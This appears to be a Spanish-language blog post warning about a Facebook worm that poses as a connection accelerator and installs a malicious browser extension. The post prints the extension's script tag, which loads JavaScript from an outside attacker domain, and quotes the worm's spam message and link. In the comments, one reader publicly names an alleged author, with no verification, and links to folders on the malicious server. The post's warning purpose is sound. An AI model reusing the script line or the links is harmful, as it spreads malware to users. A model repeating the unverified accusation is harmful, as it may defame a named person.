Gusano: Acelera tu conexion de Internet hasta un 98% en Facebook

Nos enteramos que hay una página de Facebook que anda haciendo de las suyas, engañando a los usuarios con el pretexto de "Acelerar la conexión de internet. Efectivamente lo hemos comprobado, y el engaño se aloja en esta dirección web: https://www.facebook.com/AceleratuConexion/app_208195102528120

 Tal como podrán apreciar en la imagen que adjuntamos, cuando el usuario llega hasta la página, sale ese aviso diciendo que debemos tener instalado Adobe Flash, y nos pide hacer clic en Instalar (boton en verde).

Si el usuario inocentemente hace clic sobre ese botón, se descargará una extensión (Chrome o Firefox) para su navegador web. 

Esta extensión contiene código malicioso: 
<script  src="http://www.terrorificity.com/Apps/viralinternet/viralpage.js" type="text/javascript">

Y ese código, lleva exactamente el mísmo código que Facebook ya debería haber super arreglado, ya que lo vienen usando todos los gusanos que estamos reportando en este ultimo tiempo. El js, llama a un txt, que a la vez tiene el "mensaje de expansión" que veremos publicado en nuestro muro como "gancho" para que nuestros amigos caigan en el engaño:
Increible acelere la velocidad de internet, ya nada tarda en cargar =D 
http://www.facebook.com/pages/442Acelera-tu-conexi%uFFFDn-de-internet-hasta-un-98/408000965901467?sk=app_208195102528120
Ese texto por supuesto va seguido de un enlace, que es el enlace a la página que expande nuevamente el virus.

De acuerdo a nuestro análisis, todo el virus y el motor de expansión de este gusano (incluído la imagen que engaña a los usuarios sobre el falso aviso de la necesidad de tener instalado Adobe Flash) se encuentra en un servidor bajo el dominio Terrorificity.com; pueden ver más detalles aquí en Whois.net/terrorificity.com.
Como bien lo indica ese enlace, el servidor aloja sus archivos (y el virus) en HostGator.com, si quieren reportarlo y denunciarlo, simplemente deben enviar emails aquí: http://www.hostgator.com/contact.shtml

Igual que los demas gusanos, usa código de intervalos de tiempo, para que Facebook no detecte tan rápido el atacante y bloquee sus "deseos" de SPAM.

Lo unico de lo que estamos seguros es que Facebook bloqueará "por seguridad" aquellos perfiles que hagan SPAM. Y este gusano hace SPAM... por lo tanto si han caído en este engaño, deben buscar las extensiones que se llamen "AcelerarInternet" de su navegador y eliminar las mismas.

Esto es todo por el momento.
Saludos cordiales,
MasFB


Imagen cortesía de PCSegura.net.

"Más Facebook", o MasFB es un equipo conformado por usuarios de varios países.
La misión de MasFB es ayudar a otros brindando información sobre el correcto uso de las redes sociales.

3 comentarios

avatar
Rta

Por suerte no cai en el gancho pero lo vi, me llegaron varios mensajes de amigos q si cayeron, no se daban cuenta q ya tenian instalado flash y eso era un codigo malicioso, pobre.s Facebook ya lo soluciono!

avatar
Rta

ATENCIÓN!!!! Mirando los archivos del servidor descubrí quien es el autor. En Facebook se llama:
"Mauro Sicard Salcedo" Busquenlo y denuncienló si no se lo creen aqui un enlance:
http://www.terrorificity.com/Apps/pruebas.png
Es un png de esa pagina haciendo spam de esa web!!
Pero no solo eso! tambien hay una carpeta llamada "amor" que parece ser otro virus
Solo vean:
http://www.terrorificity.com/Apps/amor/
Aqui la raiz:
http://www.terrorificity.com/Apps/
Importante:
NO ABRAN NINGUN ARCHIVO CON ENLACE RARO, SOLO ABRAN PNG, JPG, TXT O INFORMENSE DE QUE ARCHIVO ES YA QUE SE PUEDEN INFECTAR MIRANDO ;)

avatar
Rta

Hola Nacho, es lamentable pero es como tu dices. Ese servidor sigue activo, y aun nadie ni nada lo da de baja.

Has denunciado (reportado) por email a su host?

Nota Importante: Si necesitas ayuda rápida de forma más detallada, estamos respondiendo en nuestros Foros de Ayuda Facebook.
EmoticonEmoticon